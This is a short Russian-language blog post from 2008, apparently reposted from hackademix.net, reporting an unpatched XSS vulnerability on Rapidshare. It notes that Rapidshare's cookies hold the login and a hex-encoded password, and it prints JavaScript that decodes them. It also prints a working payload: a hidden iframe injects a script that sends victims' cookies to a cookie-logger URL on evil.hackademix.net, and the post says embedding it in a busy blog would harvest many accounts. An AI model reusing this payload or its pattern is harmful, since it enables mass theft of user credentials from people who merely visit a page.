Nktpro любезно сообщил о последней XSS уязвимости на Rapidshare которая до сих пор не закрыта, несмотря на то , что о ней была оповещена администрация файлообменника еще месяц назад пользователями сайта. Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie? Да , убедитесь сами: Rapidshare cookie имеют вид: user=12345-%36%37%38%39%30. В Javascript, cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16))) Поэтому этих cookie достаточно для получения доступа var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd); Это значит следующее , если включить этот код в сообщение в блоге который посещается множеством пользователей rapidshare , можно получить огромное колличество аккаунтов. var injection = "<script>(" + (function() { new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" + escape(document.cookie); }) + ")()</scr" + "ipt>" var iframe = document.body.appendChild(document.createElement("iframe")); iframe.style.visibility = "hidden"; iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" + encodeURIComponent(injection); 15\07\2008 ©http://hackademix.net/